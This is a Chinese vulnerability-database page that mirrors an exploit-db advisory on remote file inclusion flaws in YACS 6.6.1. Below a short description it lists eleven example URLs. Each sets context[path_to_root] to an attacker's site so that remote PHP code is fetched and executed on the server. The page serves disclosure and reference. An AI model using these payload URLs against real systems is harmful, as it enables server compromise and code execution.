YACS 6.6.1 - Multiple Remote File Inclusions

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055900 漏洞类型
发布时间 2006-09-01 更新时间 2006-09-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/28468
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/19799/info

YACS is prone multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

YACS Version 6.6.1 is affected by this vulnerability; other versions may also be affected.

http://www.example.com/articles/article.php?context[path_to_root]=attacker's site
http://www.example.com/articles/populate.php?context[path_to_root]=attacker's site
http://www.example.com/categories/category.php?context[path_to_root]=attacker's site
http://www.example.com/categories/populate.php?context[path_to_root]=attacker's site
http://www.example.com/comments/populate.php?context[path_to_root]=attacker's site
http://www.example.com/files/file.php?context[path_to_root]=attacker's site
http://www.example.com/sections/section.php?context[path_to_root]=attacker's site
http://www.example.com/sections/populate.php?context[path_to_root]=attacker's site
http://www.example.com/tables/populate.php?context[path_to_root]=attacker's site
http://www.example.com/users/user.php?context[path_to_root]=attacker's site
http://www.example.com/users/populate.php?context[path_to_root]=attacker's site